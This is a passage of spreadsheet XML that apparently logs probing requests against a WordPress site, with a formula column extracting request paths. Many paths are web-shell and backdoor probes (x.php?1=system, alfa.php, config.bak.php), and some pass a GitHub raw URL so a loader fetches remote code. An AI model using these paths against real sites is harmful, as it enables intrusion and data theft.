      <c r="C5386" t="s">
        <v>1371</v>
      </c>
      <c r="D5386" t="str">
        <f t="shared" si="84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386" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5387" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5387" s="1">
        <v>45122.099490740744</v>
      </c>
      <c r="B5387" t="s">
        <v>1845</v>
      </c>
      <c r="C5387" t="s">
        <v>1372</v>
      </c>
      <c r="D5387" t="str">
        <f t="shared" si="84"/>
        <v>/wp-content/x.php?1=system</v>
      </c>
      <c r="E5387" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5388" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5388" s="1">
        <v>45122.09946759259</v>
      </c>
      <c r="B5388" t="s">
        <v>1845</v>
      </c>
      <c r="C5388" t="s">
        <v>1374</v>
      </c>
      <c r="D5388" t="str">
        <f t="shared" si="84"/>
        <v>abruzi.php4</v>
      </c>
      <c r="E5388" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5389" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5389" s="1">
        <v>45122.099444444444</v>
      </c>
      <c r="B5389" t="s">
        <v>1845</v>
      </c>
      <c r="C5389" t="s">
        <v>1373</v>
      </c>
      <c r="D5389" t="str">
        <f t="shared" si="84"/>
        <v>wp-content/uploads/typehub/custom/a57bze8931/.__a57bze8931.php</v>
      </c>
      <c r="E5389" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5390" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5390" s="1">
        <v>45122.099432870367</v>
      </c>
      <c r="B5390" t="s">
        <v>1845</v>
      </c>
      <c r="C5390" t="s">
        <v>1376</v>
      </c>
      <c r="D5390" t="str">
        <f t="shared" si="84"/>
        <v>wp-content/plugins/apikey/a57bze8931.php</v>
      </c>
      <c r="E5390" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5391" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5391" s="1">
        <v>45122.099409722221</v>
      </c>
      <c r="B5391" t="s">
        <v>1845</v>
      </c>
      <c r="C5391" t="s">
        <v>1377</v>
      </c>
      <c r="D5391" t="str">
        <f t="shared" si="84"/>
        <v>wp-content/uploads/kaswara/fonts_icon/a57bze8931/.__a57bze8931.php</v>
      </c>
      <c r="E5391" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5392" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5392" s="1">
        <v>45122.099409722221</v>
      </c>
      <c r="B5392" t="s">
        <v>1845</v>
      </c>
      <c r="C5392" t="s">
        <v>1375</v>
      </c>
      <c r="D5392" t="str">
        <f t="shared" si="84"/>
        <v>/wp-content/plugins/apikey/apikey.php</v>
      </c>
      <c r="E5392" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5393" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5393" s="1">
        <v>45121.922233796293</v>
      </c>
      <c r="B5393" t="s">
        <v>1845</v>
      </c>
      <c r="C5393" t="s">
        <v>1378</v>
      </c>
      <c r="D5393" t="str">
        <f t="shared" si="84"/>
        <v>wp-content/plugins/wp-file-upload/ROOBOTS.php</v>
      </c>
      <c r="E5393" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5394" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5394" s="1">
        <v>45121.922210648147</v>
      </c>
      <c r="B5394" t="s">
        <v>1845</v>
      </c>
      <c r="C5394" t="s">
        <v>1379</v>
      </c>
      <c r="D5394" t="str">
        <f t="shared" si="84"/>
        <v>wp-content/plugins/wordpresss3cll/up.php</v>
      </c>
      <c r="E5394" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5395" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5395" s="1">
        <v>45121.922152777777</v>
      </c>
      <c r="B5395" t="s">
        <v>1845</v>
      </c>
      <c r="C5395" t="s">
        <v>1380</v>
      </c>
      <c r="D5395" t="str">
        <f t="shared" si="84"/>
        <v>wp-content/plugins/TOPXOH/wDR.php</v>
      </c>
      <c r="E5395" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5396" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5396" s="1">
        <v>45121.922094907408</v>
      </c>
      <c r="B5396" t="s">
        <v>1845</v>
      </c>
      <c r="C5396" t="s">
        <v>1381</v>
      </c>
      <c r="D5396" t="str">
        <f t="shared" si="84"/>
        <v>wp-content/plugins/anttt/simple.php</v>
      </c>
      <c r="E5396" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5397" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5397" s="1">
        <v>45121.842604166668</v>
      </c>
      <c r="B5397" t="s">
        <v>1845</v>
      </c>
      <c r="C5397" t="s">
        <v>1794</v>
      </c>
      <c r="D5397" t="str">
        <f t="shared" si="84"/>
        <v>wp-content/plugins/hellopress/wp_filemanager.php</v>
      </c>
      <c r="E5397" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5398" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5398" s="1">
        <v>45121.842442129629</v>
      </c>
      <c r="B5398" t="s">
        <v>1845</v>
      </c>
      <c r="C5398" t="s">
        <v>1794</v>
      </c>
      <c r="D5398" t="str">
        <f t="shared" si="84"/>
        <v>wp-content/plugins/hellopress/wp_filemanager.php</v>
      </c>
      <c r="E5398" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5399" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5399" s="1">
        <v>45121.84207175926</v>
      </c>
      <c r="B5399" t="s">
        <v>1845</v>
      </c>
      <c r="C5399" t="s">
        <v>41</v>
      </c>
      <c r="D5399" t="str">
        <f t="shared" si="84"/>
        <v>wp-content/themes/seotheme/db.php?u</v>
      </c>
      <c r="E5399" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5400" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5400" s="1">
        <v>45121.842013888891</v>
      </c>
      <c r="B5400" t="s">
        <v>1845</v>
      </c>
      <c r="C5400" t="s">
        <v>41</v>
      </c>
      <c r="D5400" t="str">
        <f t="shared" si="84"/>
        <v>wp-content/themes/seotheme/db.php?u</v>
      </c>
      <c r="E5400" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5401" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5401" s="1">
        <v>45121.428356481483</v>
      </c>
      <c r="B5401" t="s">
        <v>1846</v>
      </c>
      <c r="C5401" t="s">
        <v>688</v>
      </c>
      <c r="D5401" t="str">
        <f t="shared" si="84"/>
        <v>wp-admin/dropdown.php</v>
      </c>
      <c r="E5401" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5402" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5402" s="1">
        <v>45121.42827546296</v>
      </c>
      <c r="B5402" t="s">
        <v>1846</v>
      </c>
      <c r="C5402" t="s">
        <v>688</v>
      </c>
      <c r="D5402" t="str">
        <f t="shared" si="84"/>
        <v>wp-admin/dropdown.php</v>
      </c>
      <c r="E5402" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5403" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5403" s="1">
        <v>45121.428206018521</v>
      </c>
      <c r="B5403" t="s">
        <v>1846</v>
      </c>
      <c r="C5403" t="s">
        <v>1847</v>
      </c>
      <c r="D5403" t="str">
        <f t="shared" si="84"/>
        <v>shell20211028/</v>
      </c>
      <c r="E5403" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5404" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5404" s="1">
        <v>45121.428136574075</v>
      </c>
      <c r="B5404" t="s">
        <v>1846</v>
      </c>
      <c r="C5404" t="s">
        <v>695</v>
      </c>
      <c r="D5404" t="str">
        <f t="shared" si="84"/>
        <v>wp-content/themes/seotheme/mar.php</v>
      </c>
      <c r="E5404" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5405" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5405" s="1">
        <v>45121.428055555552</v>
      </c>
      <c r="B5405" t="s">
        <v>1846</v>
      </c>
      <c r="C5405" t="s">
        <v>695</v>
      </c>
      <c r="D5405" t="str">
        <f t="shared" si="84"/>
        <v>wp-content/themes/seotheme/mar.php</v>
      </c>
      <c r="E5405" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5406" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5406" s="1">
        <v>45121.42796296296</v>
      </c>
      <c r="B5406" t="s">
        <v>1846</v>
      </c>
      <c r="C5406" t="s">
        <v>963</v>
      </c>
      <c r="D5406" t="str">
        <f t="shared" si="84"/>
        <v>1index.php</v>
      </c>
      <c r="E5406" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5407" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5407" s="1">
        <v>45121.427893518521</v>
      </c>
      <c r="B5407" t="s">
        <v>1846</v>
      </c>
      <c r="C5407" t="s">
        <v>963</v>
      </c>
      <c r="D5407" t="str">
        <f t="shared" si="84"/>
        <v>1index.php</v>
      </c>
      <c r="E5407" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5408" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5408" s="1">
        <v>45121.427800925929</v>
      </c>
      <c r="B5408" t="s">
        <v>1846</v>
      </c>
      <c r="C5408" t="s">
        <v>997</v>
      </c>
      <c r="D5408" t="str">
        <f t="shared" si="84"/>
        <v>wp-content/plugins/press/wp-class.php</v>
      </c>
      <c r="E5408" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5409" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5409" s="1">
        <v>45121.427731481483</v>
      </c>
      <c r="B5409" t="s">
        <v>1846</v>
      </c>
      <c r="C5409" t="s">
        <v>997</v>
      </c>
      <c r="D5409" t="str">
        <f t="shared" si="84"/>
        <v>wp-content/plugins/press/wp-class.php</v>
      </c>
      <c r="E5409" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5410" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5410" s="1">
        <v>45121.42763888889</v>
      </c>
      <c r="B5410" t="s">
        <v>1846</v>
      </c>
      <c r="C5410" t="s">
        <v>122</v>
      </c>
      <c r="D5410" t="str">
        <f t="shared" si="84"/>
        <v>wp-content/plugins/fix/up.php</v>
      </c>
      <c r="E5410" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5411" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5411" s="1">
        <v>45121.427569444444</v>
      </c>
      <c r="B5411" t="s">
        <v>1846</v>
      </c>
      <c r="C5411" t="s">
        <v>122</v>
      </c>
      <c r="D5411" t="str">
        <f t="shared" si="84"/>
        <v>wp-content/plugins/fix/up.php</v>
      </c>
      <c r="E5411" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5412" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5412" s="1">
        <v>45121.427141203705</v>
      </c>
      <c r="B5412" t="s">
        <v>1846</v>
      </c>
      <c r="C5412" t="s">
        <v>1572</v>
      </c>
      <c r="D5412" t="str">
        <f t="shared" si="84"/>
        <v>.well-known/pki-validation/admin.php</v>
      </c>
      <c r="E5412" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5413" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5413" s="1">
        <v>45121.426516203705</v>
      </c>
      <c r="B5413" t="s">
        <v>1846</v>
      </c>
      <c r="C5413" t="s">
        <v>392</v>
      </c>
      <c r="D5413" t="str">
        <f t="shared" si="84"/>
        <v>admin.php</v>
      </c>
      <c r="E5413" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5414" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5414" s="1">
        <v>45121.426435185182</v>
      </c>
      <c r="B5414" t="s">
        <v>1846</v>
      </c>
      <c r="C5414" t="s">
        <v>392</v>
      </c>
      <c r="D5414" t="str">
        <f t="shared" si="84"/>
        <v>admin.php</v>
      </c>
      <c r="E5414" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5415" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5415" s="1">
        <v>45121.426342592589</v>
      </c>
      <c r="B5415" t="s">
        <v>1846</v>
      </c>
      <c r="C5415" t="s">
        <v>1574</v>
      </c>
      <c r="D5415" t="str">
        <f t="shared" si="84"/>
        <v>.well-known/pki-validation/moon.php</v>
      </c>
      <c r="E5415" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5416" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5416" s="1">
        <v>45121.266863425924</v>
      </c>
      <c r="B5416" t="s">
        <v>1788</v>
      </c>
      <c r="C5416" t="s">
        <v>1187</v>
      </c>
      <c r="D5416" t="str">
        <f t="shared" si="84"/>
        <v>alfa-rex.php7</v>
      </c>
      <c r="E5416" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5417" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5417" s="1">
        <v>45121.266342592593</v>
      </c>
      <c r="B5417" t="s">
        <v>1788</v>
      </c>
      <c r="C5417" t="s">
        <v>1498</v>
      </c>
      <c r="D5417" t="str">
        <f t="shared" si="84"/>
        <v>alfa-rex.php</v>
      </c>
      <c r="E5417" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5418" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5418" s="1">
        <v>45120.283055555556</v>
      </c>
      <c r="B5418" t="s">
        <v>1848</v>
      </c>
      <c r="C5418" t="s">
        <v>5</v>
      </c>
      <c r="D5418" t="str">
        <f t="shared" si="84"/>
        <v/>
      </c>
      <c r="E5418" t="s">
        <v>1849</v>
      </c>
    </row>
    <row r="5419" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5419" s="1">
        <v>45120.09920138889</v>
      </c>
      <c r="B5419" t="s">
        <v>1850</v>
      </c>
      <c r="C5419" t="s">
        <v>688</v>
      </c>
      <c r="D5419" t="str">
        <f t="shared" si="84"/>
        <v>wp-admin/dropdown.php</v>
      </c>
      <c r="E5419" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5420" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5420" s="1">
        <v>45120.099097222221</v>
      </c>
      <c r="B5420" t="s">
        <v>1850</v>
      </c>
      <c r="C5420" t="s">
        <v>688</v>
      </c>
      <c r="D5420" t="str">
        <f t="shared" si="84"/>
        <v>wp-admin/dropdown.php</v>
      </c>
      <c r="E5420" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5421" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5421" s="1">
        <v>45120.099004629628</v>
      </c>
      <c r="B5421" t="s">
        <v>1850</v>
      </c>
      <c r="C5421" t="s">
        <v>1847</v>
      </c>
      <c r="D5421" t="str">
        <f t="shared" si="84"/>
        <v>shell20211028/</v>
      </c>
      <c r="E5421" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5422" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5422" s="1">
        <v>45120.098356481481</v>
      </c>
      <c r="B5422" t="s">
        <v>1850</v>
      </c>
      <c r="C5422" t="s">
        <v>695</v>
      </c>
      <c r="D5422" t="str">
        <f t="shared" si="84"/>
        <v>wp-content/themes/seotheme/mar.php</v>
      </c>
      <c r="E5422" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5423" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5423" s="1">
        <v>45120.098043981481</v>
      </c>
      <c r="B5423" t="s">
        <v>1850</v>
      </c>
      <c r="C5423" t="s">
        <v>963</v>
      </c>
      <c r="D5423" t="str">
        <f t="shared" si="84"/>
        <v>1index.php</v>
      </c>
      <c r="E5423" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5424" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5424" s="1">
        <v>45120.097662037035</v>
      </c>
      <c r="B5424" t="s">
        <v>1850</v>
      </c>
      <c r="C5424" t="s">
        <v>963</v>
      </c>
      <c r="D5424" t="str">
        <f t="shared" si="84"/>
        <v>1index.php</v>
      </c>
      <c r="E5424" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5425" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5425" s="1">
        <v>45120.096944444442</v>
      </c>
      <c r="B5425" t="s">
        <v>1850</v>
      </c>
      <c r="C5425" t="s">
        <v>997</v>
      </c>
      <c r="D5425" t="str">
        <f t="shared" si="84"/>
        <v>wp-content/plugins/press/wp-class.php</v>
      </c>
      <c r="E5425" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5426" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5426" s="1">
        <v>45120.096678240741</v>
      </c>
      <c r="B5426" t="s">
        <v>1850</v>
      </c>
      <c r="C5426" t="s">
        <v>122</v>
      </c>
      <c r="D5426" t="str">
        <f t="shared" si="84"/>
        <v>wp-content/plugins/fix/up.php</v>
      </c>
      <c r="E5426" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5427" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5427" s="1">
        <v>45120.096273148149</v>
      </c>
      <c r="B5427" t="s">
        <v>1850</v>
      </c>
      <c r="C5427" t="s">
        <v>122</v>
      </c>
      <c r="D5427" t="str">
        <f t="shared" si="84"/>
        <v>wp-content/plugins/fix/up.php</v>
      </c>
      <c r="E5427" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5428" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5428" s="1">
        <v>45120.093171296299</v>
      </c>
      <c r="B5428" t="s">
        <v>1850</v>
      </c>
      <c r="C5428" t="s">
        <v>392</v>
      </c>
      <c r="D5428" t="str">
        <f t="shared" si="84"/>
        <v>admin.php</v>
      </c>
      <c r="E5428" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5429" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5429" s="1">
        <v>45120.092881944445</v>
      </c>
      <c r="B5429" t="s">
        <v>1850</v>
      </c>
      <c r="C5429" t="s">
        <v>392</v>
      </c>
      <c r="D5429" t="str">
        <f t="shared" si="84"/>
        <v>admin.php</v>
      </c>
      <c r="E5429" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5430" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5430" s="1">
        <v>45116.972731481481</v>
      </c>
      <c r="B5430" t="s">
        <v>1851</v>
      </c>
      <c r="C5430" t="s">
        <v>1813</v>
      </c>
      <c r="D5430" t="str">
        <f t="shared" si="84"/>
        <v>wp-content/plugins/wpdiscuz/themes/default/style-rtl.css</v>
      </c>
      <c r="E5430" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5431" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5431" s="1">
        <v>45116.972627314812</v>
      </c>
      <c r="B5431" t="s">
        <v>1851</v>
      </c>
      <c r="C5431" t="s">
        <v>1815</v>
      </c>
      <c r="D5431" t="str">
        <f t="shared" si="84"/>
        <v>wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php</v>
      </c>
      <c r="E5431" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5432" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5432" s="1">
        <v>45116.97247685185</v>
      </c>
      <c r="B5432" t="s">
        <v>1851</v>
      </c>
      <c r="C5432" t="s">
        <v>1852</v>
      </c>
      <c r="D5432" t="str">
        <f t="shared" si="84"/>
        <v>wp-content/langar.php</v>
      </c>
      <c r="E5432" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5433" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5433" s="1">
        <v>45116.972384259258</v>
      </c>
      <c r="B5433" t="s">
        <v>1851</v>
      </c>
      <c r="C5433" t="s">
        <v>1818</v>
      </c>
      <c r="D5433" t="str">
        <f t="shared" si="84"/>
        <v>fox-index.php</v>
      </c>
      <c r="E5433" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5434" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5434" s="1">
        <v>45116.972326388888</v>
      </c>
      <c r="B5434" t="s">
        <v>1851</v>
      </c>
      <c r="C5434" t="s">
        <v>1817</v>
      </c>
      <c r="D5434" t="str">
        <f t="shared" si="84"/>
        <v>upload.php</v>
      </c>
      <c r="E5434" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5435" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5435" s="1">
        <v>45116.972233796296</v>
      </c>
      <c r="B5435" t="s">
        <v>1851</v>
      </c>
      <c r="C5435" t="s">
        <v>1818</v>
      </c>
      <c r="D5435" t="str">
        <f t="shared" si="84"/>
        <v>fox-index.php</v>
      </c>
      <c r="E5435" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5436" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5436" s="1">
        <v>45116.972187500003</v>
      </c>
      <c r="B5436" t="s">
        <v>1851</v>
      </c>
      <c r="C5436" t="s">
        <v>1817</v>
      </c>
      <c r="D5436" t="str">
        <f t="shared" si="84"/>
        <v>upload.php</v>
      </c>
      <c r="E5436" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5437" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5437" s="1">
        <v>45116.97210648148</v>
      </c>
      <c r="B5437" t="s">
        <v>1851</v>
      </c>
      <c r="C5437" t="s">
        <v>1817</v>
      </c>
      <c r="D5437" t="str">
        <f t="shared" si="84"/>
        <v>upload.php</v>
      </c>
      <c r="E5437" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5438" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5438" s="1">
        <v>45116.971898148149</v>
      </c>
      <c r="B5438" t="s">
        <v>1851</v>
      </c>
      <c r="C5438" t="s">
        <v>937</v>
      </c>
      <c r="D5438" t="str">
        <f t="shared" si="84"/>
        <v>wp-content/mu-plugins/db-safe-mode.php</v>
      </c>
      <c r="E5438" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5439" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5439" s="1">
        <v>45116.97179398148</v>
      </c>
      <c r="B5439" t="s">
        <v>1851</v>
      </c>
      <c r="C5439" t="s">
        <v>1819</v>
      </c>
      <c r="D5439" t="str">
        <f t="shared" si="84"/>
        <v>wp-content/wp-old-index.php?action=login&amp;pass=-1&amp;submit=</v>
      </c>
      <c r="E5439" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5440" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5440" s="1">
        <v>45116.971712962964</v>
      </c>
      <c r="B5440" t="s">
        <v>1851</v>
      </c>
      <c r="C5440" t="s">
        <v>1820</v>
      </c>
      <c r="D5440" t="str">
        <f t="shared" si="84"/>
        <v>haders.php</v>
      </c>
      <c r="E5440" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5441" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5441" s="1">
        <v>45116.971631944441</v>
      </c>
      <c r="B5441" t="s">
        <v>1851</v>
      </c>
      <c r="C5441" t="s">
        <v>933</v>
      </c>
      <c r="D5441" t="str">
        <f t="shared" si="84"/>
        <v>wp-content/plugins/wpconfig.bak.php?act=sf</v>
      </c>
      <c r="E5441" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5442" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5442" s="1">
        <v>45116.971516203703</v>
      </c>
      <c r="B5442" t="s">
        <v>1851</v>
      </c>
      <c r="C5442" t="s">
        <v>895</v>
      </c>
      <c r="D5442" t="str">
        <f t="shared" ref="D5442:D5505" si="85">MID(C5442,FIND("#", SUBSTITUTE(C5442, "/", "#", 3))+1,LEN(C5442)-FIND("#", SUBSTITUTE(C5442, "/", "#", 3))+1)</f>
        <v>wp-content/plugins/ubh/up.php</v>
      </c>
      <c r="E5442" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5443" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5443" s="1">
        <v>45116.971377314818</v>
      </c>
      <c r="B5443" t="s">
        <v>1851</v>
      </c>
      <c r="C5443" t="s">
        <v>1821</v>
      </c>
      <c r="D5443" t="str">
        <f t="shared" si="85"/>
        <v>wp-content/plugins/config.bak.php</v>
      </c>
      <c r="E5443" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5444" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5444" s="1">
        <v>45116.971307870372</v>
      </c>
      <c r="B5444" t="s">
        <v>1851</v>
      </c>
      <c r="C5444" t="s">
        <v>935</v>
      </c>
      <c r="D5444" t="str">
        <f t="shared" si="85"/>
        <v>wp-content/themes/config.bak.php</v>
      </c>
      <c r="E5444" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5445" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5445" s="1">
        <v>45116.971203703702</v>
      </c>
      <c r="B5445" t="s">
        <v>1851</v>
      </c>
      <c r="C5445" t="s">
        <v>1853</v>
      </c>
      <c r="D5445" t="str">
        <f t="shared" si="85"/>
        <v>wp-content/config.bak.php</v>
      </c>
      <c r="E5445" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5446" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5446" s="1">
        <v>45116.971134259256</v>
      </c>
      <c r="B5446" t="s">
        <v>1851</v>
      </c>
      <c r="C5446" t="s">
        <v>1822</v>
      </c>
      <c r="D5446" t="str">
        <f t="shared" si="85"/>
        <v>wp-admin/config.bak.php</v>
      </c>
      <c r="E5446" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5447" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5447" s="1">
        <v>45116.971030092594</v>
      </c>
      <c r="B5447" t="s">
        <v>1851</v>
      </c>
      <c r="C5447" t="s">
        <v>936</v>
      </c>
      <c r="D5447" t="str">
        <f t="shared" si="85"/>
        <v>config.bak.php</v>
      </c>
      <c r="E5447" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5448" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5448" s="1">
        <v>45116.970810185187</v>
      </c>
      <c r="B5448" t="s">
        <v>1851</v>
      </c>
      <c r="C5448" t="s">
        <v>1825</v>
      </c>
      <c r="D5448" t="str">
        <f t="shared" si="85"/>
        <v>wp-1ogin_bak.php</v>
      </c>
      <c r="E5448" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5449" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5449" s="1">
        <v>45116.970717592594</v>
      </c>
      <c r="B5449" t="s">
        <v>1851</v>
      </c>
      <c r="C5449" t="s">
        <v>1827</v>
      </c>
      <c r="D5449" t="str">
        <f t="shared" si="85"/>
        <v>cindex.php</v>
      </c>
      <c r="E5449" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5450" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5450" s="1">
        <v>45116.970648148148</v>
      </c>
      <c r="B5450" t="s">
        <v>1851</v>
      </c>
      <c r="C5450" t="s">
        <v>939</v>
      </c>
      <c r="D5450" t="str">
        <f t="shared" si="85"/>
        <v>wp-booking.php</v>
      </c>
      <c r="E5450" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5451" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5451" s="1">
        <v>45116.970578703702</v>
      </c>
      <c r="B5451" t="s">
        <v>1851</v>
      </c>
      <c r="C5451" t="s">
        <v>879</v>
      </c>
      <c r="D5451" t="str">
        <f t="shared" si="85"/>
        <v>alfa.php</v>
      </c>
      <c r="E5451" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5452" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5452" s="1">
        <v>45116.970451388886</v>
      </c>
      <c r="B5452" t="s">
        <v>1851</v>
      </c>
      <c r="C5452" t="s">
        <v>1830</v>
      </c>
      <c r="D5452" t="str">
        <f t="shared" si="85"/>
        <v>larva.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1</v>
      </c>
      <c r="E5452" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5453" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5453" s="1">
        <v>45116.970381944448</v>
      </c>
      <c r="B5453" t="s">
        <v>1851</v>
      </c>
      <c r="C5453" t="s">
        <v>1831</v>
      </c>
      <c r="D5453" t="str">
        <f t="shared" si="85"/>
        <v>wpindex.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1</v>
      </c>
      <c r="E5453" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5454" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5454" s="1">
        <v>45116.970312500001</v>
      </c>
      <c r="B5454" t="s">
        <v>1851</v>
      </c>
      <c r="C5454" t="s">
        <v>1854</v>
      </c>
      <c r="D5454" t="str">
        <f t="shared" si="85"/>
        <v>xmlrp.php?url=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1</v>
      </c>
      <c r="E5454" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5455" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5455" s="1">
        <v>45116.970277777778</v>
      </c>
      <c r="B5455" t="s">
        <v>1851</v>
      </c>
      <c r="C5455" t="s">
        <v>1832</v>
      </c>
      <c r="D5455" t="str">
        <f t="shared" si="85"/>
        <v>wp-content/plugins/ioptimization/IOptimize.php?rchk</v>
      </c>
      <c r="E5455" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="5456" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5456" s="1">
        <v>45116.970231481479</v>
      </c>
      <c r="B5456" t="s">
        <v>1851</v>
      </c>
      <c r="C5456" t="s">
        <v>1833</v>
      </c>
      <c r="D5456" t="str">
